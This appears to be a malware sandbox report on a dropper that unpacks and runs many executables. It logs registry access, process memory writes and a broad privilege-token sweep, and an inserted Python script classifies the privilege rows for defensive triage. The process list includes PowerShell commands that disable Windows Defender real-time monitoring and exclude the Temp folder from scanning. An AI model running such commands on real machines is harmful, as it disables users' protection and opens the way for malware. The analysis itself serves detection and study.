Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c28f648204dbd4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19cef5687a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19ac3c92c21.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue192c34b1c2f5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19b4b38a7569a9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-9QQVE.tmp\Tue196397c0f84f8.tmp N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue192c34b1c2f5.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19b4b38a7569a9.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19cd42a7c874e44.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
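Added example, not part of the report: the table above lists the privileges Tue193129b31e741ef3.exe enabled in winnt.h LUID order, from SeCreateTokenPrivilege (LUID 2) through SeCreateGlobalPrivilege (30), followed by the bare numbers 31 to 35 that the sandbox did not resolve to names: SeTrustedCredManAccessPrivilege, SeRelabelPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege and SeCreateSymbolicLinkPrivilege. Walking every LUID like that is what a loop calling AdjustTokenPrivileges once per privilege looks like, as opposed to the single SeDebugPrivilege that taskkill.exe, powershell.exe and Tue19cd42a7c874e44.exe request. The Python below resolves the table's entries (including the sandbox's short forms SeProfSingleProcessPrivilege and SeIncBasePriorityPrivilege, which are SeProfileSingleProcessPrivilege and SeIncreaseBasePriorityPrivilege) and classifies each process. The sample rows are constructed from the table; the 20-privilege threshold is an assumption.

```python
import re
from collections import defaultdict

# Privilege LUIDs as defined in winnt.h (SE_*_PRIVILEGE, 2..36).
PRIVILEGE_NAMES = {
    2: "SeCreateTokenPrivilege", 3: "SeAssignPrimaryTokenPrivilege", 4: "SeLockMemoryPrivilege",
    5: "SeIncreaseQuotaPrivilege", 6: "SeMachineAccountPrivilege", 7: "SeTcbPrivilege",
    8: "SeSecurityPrivilege", 9: "SeTakeOwnershipPrivilege", 10: "SeLoadDriverPrivilege",
    11: "SeSystemProfilePrivilege", 12: "SeSystemtimePrivilege", 13: "SeProfileSingleProcessPrivilege",
    14: "SeIncreaseBasePriorityPrivilege", 15: "SeCreatePagefilePrivilege", 16: "SeCreatePermanentPrivilege",
    17: "SeBackupPrivilege", 18: "SeRestorePrivilege", 19: "SeShutdownPrivilege",
    20: "SeDebugPrivilege", 21: "SeAuditPrivilege", 22: "SeSystemEnvironmentPrivilege",
    23: "SeChangeNotifyPrivilege", 24: "SeRemoteShutdownPrivilege", 25: "SeUndockPrivilege",
    26: "SeSyncAgentPrivilege", 27: "SeEnableDelegationPrivilege", 28: "SeManageVolumePrivilege",
    29: "SeImpersonatePrivilege", 30: "SeCreateGlobalPrivilege", 31: "SeTrustedCredManAccessPrivilege",
    32: "SeRelabelPrivilege", 33: "SeIncreaseWorkingSetPrivilege", 34: "SeTimeZonePrivilege",
    35: "SeCreateSymbolicLinkPrivilege", 36: "SeDelegateSessionUserImpersonatePrivilege",
}
# Short forms the sandbox prints for two of the names.
SANDBOX_ALIASES = {"SeProfSingleProcessPrivilege": 13, "SeIncBasePriorityPrivilege": 14}
NAME_TO_LUID = {name: luid for luid, name in PRIVILEGE_NAMES.items()}
NAME_TO_LUID.update(SANDBOX_ALIASES)

# Privileges no interactive user or administrator token holds by default; a user-mode
# dropper asking for them is enabling blindly, not because it needs them.
NEVER_IN_USER_TOKEN = {2, 3, 7}

# Constructed rows reproducing the AdjustPrivilegeToken table above.
SWEEPER = r"C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe"
_PRINTED = dict(PRIVILEGE_NAMES)
_PRINTED.update({13: "SeProfSingleProcessPrivilege", 14: "SeIncBasePriorityPrivilege"})
SAMPLE_ROWS = (
    [f"Token: {_PRINTED[i]} N/A {SWEEPER} N/A" for i in range(2, 31)]
    + [f"Token: {i} N/A {SWEEPER} N/A" for i in range(31, 36)]
    + [r"Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A",
       r"Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A",
       r"Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19cd42a7c874e44.exe N/A"]
)

# Row layout: "Token: <name-or-luid> N/A <process> N/A" (these process paths contain no spaces).
ROW = re.compile(r"^Token:\s+(\S+)\s+N/A\s+(\S+)\s+N/A$")


def resolve(token):
    """Map a table entry (privilege name or bare LUID) to (luid, canonical name)."""
    luid = int(token) if token.isdigit() else NAME_TO_LUID.get(token)
    if luid is None or luid not in PRIVILEGE_NAMES:
        return None, token
    return luid, PRIVILEGE_NAMES[luid]


def privileges_by_process(rows):
    """Group the distinct (luid, name) pairs each process adjusted."""
    per_proc = defaultdict(set)
    for line in rows:
        m = ROW.match(line.strip())
        if m:
            per_proc[m.group(2)].add(resolve(m.group(1)))
    return per_proc


def classify(per_proc, sweep_threshold=20):
    """Label each process: blind sweep, SeDebugPrivilege only, or a targeted request."""
    verdicts = {}
    for proc, privs in per_proc.items():
        luids = {l for l, _ in privs if l is not None}
        if len(luids) >= sweep_threshold or NEVER_IN_USER_TOKEN <= luids:
            verdict = "privilege sweep: AdjustTokenPrivileges over every LUID"
        elif luids == {20}:
            verdict = "SeDebugPrivilege only: cross-process access (taskkill, injection, dumping)"
        else:
            verdict = "targeted: " + ", ".join(sorted(n for _, n in privs))
        verdicts[proc] = {"count": len(luids), "verdict": verdict}
    return verdicts
```

AdjustTokenPrivileges can only enable privileges the token already holds, so the sweep grants the process nothing it did not have; it is a fingerprint of the code, useful for clustering the dropped executables, not an escalation. SeDebugPrivilege on its own is expected from taskkill.exe and from PowerShell, so the single-privilege class is the one that needs the parent chain to be judged.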

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2900 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe
PID 2900 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe
PID 2900 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe
PID 2900 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe
PID 2900 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe
PID 2900 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe
PID 2900 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe
PID 2704 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19ac3c92c21.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c9e031f4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1932df4dae.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue193e530416b51740a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c28f648204dbd4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1968b7ee9058232e8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue196397c0f84f8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue192c34b1c2f5.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue197e9ec0ff0.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue193129b31e741ef3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19cef5687a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19d1fc7d2654d7a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19cd42a7c874e44.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19b4b38a7569a9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19cd42a7c874e44.exe

Tue19cd42a7c874e44.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c28f648204dbd4.exe

Tue19c28f648204dbd4.exe

